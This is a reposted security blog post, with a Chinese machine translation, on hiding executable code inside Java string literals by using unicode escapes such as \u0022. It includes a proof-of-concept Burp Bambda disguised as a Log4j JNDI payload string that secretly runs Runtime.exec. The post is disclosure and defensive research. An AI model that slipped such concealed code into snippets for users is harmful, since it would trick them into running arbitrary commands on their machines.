Hiding payloads in Java source code strings

渗透技巧 10个月前 admin
47 0 0

Hiding payloads in Java source code strings

In this post we’ll show you how Java handles unicode escapes in source code strings in a way you might find surprising – and how you can abuse them to conceal payloads.
在这篇文章中,我们将向您展示Java如何以一种您可能会感到惊讶的方式处理源代码字符串中的unicode转义,以及如何滥用它们来隐藏有效载荷。

We recently released a powerful new feature called Bambdas . They allow you to filter items in Burp using Java code. But that got us wondering, what if you could convince a user to run a Bambda that looked like an honest exploit payload but actually executed arbitrary code on the local machine?
我们最近发布了一个强大的新功能,称为Bambdas。它们允许您使用Java代码过滤Burp中的项目。但这让我们想知道,如果你能说服用户运行一个看起来像是诚实的漏洞利用有效载荷但实际上在本地机器上执行任意代码的Bambda,会怎么样?

What do you expect would happen when you use the following in a Bambda:
当你在Bambda中使用以下内容时,你希望会发生什么:


var log4jpayload = "%24%7Bndi:ldap://psres.net/\u0022;Runtime.getRuntime().exec(\u0022open -a calculator\u0022);//%7D";
return requestResponse.request().contains(log4jpayload, false)

If you were expecting a simple string assignment you’d be wrong. What actually happens is the Java compiler treats the unicode encoded double quote (\u0022) as a double quote and closes the string. Then Runtime.getRuntime() is executed along with the command passed with an encoded string. Java pretty much allows you to encode the entire syntax with unicode escapes!
如果你期待一个简单的字符串赋值,你就错了。实际上,Java编译器将unicode编码的双引号(\u0022)视为双引号并关闭字符串。然后沿着传递带有编码字符串的命令一起执行. getString()。Java几乎允许你用unicode转义来编码整个语法!

We couldn’t find this technique publicly documented anywhere, but if you liked this you can find a bunch of related attacks in this paper .
我们在任何地方都找不到这种技术的公开文档,但是如果你喜欢这个,你可以在本文中找到一堆相关的攻击。

Remember a Bambda allows arbitrary code execution so when using one from an untrusted source make sure you validate it before using it!
请记住,Bambda允许执行任意代码,因此当使用来自不受信任来源的Bambda时,请确保在使用之前对其进行验证!

原文始发于Gareth Heyes:Hiding payloads in Java source code strings

版权声明:admin 发表于 2024年1月24日 上午10:31。
转载请注明:Hiding payloads in Java source code strings | CTF导航

相关文章